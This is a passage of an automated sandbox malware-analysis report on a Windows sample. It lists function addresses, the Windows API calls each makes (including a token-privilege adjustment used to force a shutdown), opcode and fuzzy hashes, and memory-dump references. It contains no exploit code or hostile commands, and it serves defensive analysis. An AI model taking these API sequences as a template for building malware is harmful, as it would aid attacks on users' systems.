                                                                                                      • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                      • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                      Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                      • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                      Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                      • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                      • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                      • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                      Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                      • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                      • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                      • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                      Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 1306739567-0
                                                                                                      • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                      • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                      • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                      • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                      Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,021C4000,0040A08C,00000000), ref: 004076B3
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                      • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                      • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                      • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                      Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                      • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                      • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                      • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                      Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                      • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                      • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                      • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                      Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrev
                                                                                                      • String ID:
                                                                                                      • API String ID: 122130370-0
                                                                                                      • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                      • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                      • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                      • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                      • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                      Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                      Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                      • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                      Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                      • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

                                                                                                      Non-executed Functions

                                                                                                      Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                      • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                      Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                      • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                      • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                      • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                      Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                      • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                                      • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                      • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                                      Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SystemTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2656138-0
                                                                                                      • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                      • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                      Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                      • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                      • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                      • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                      Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                      • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                      • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                      • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                      Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
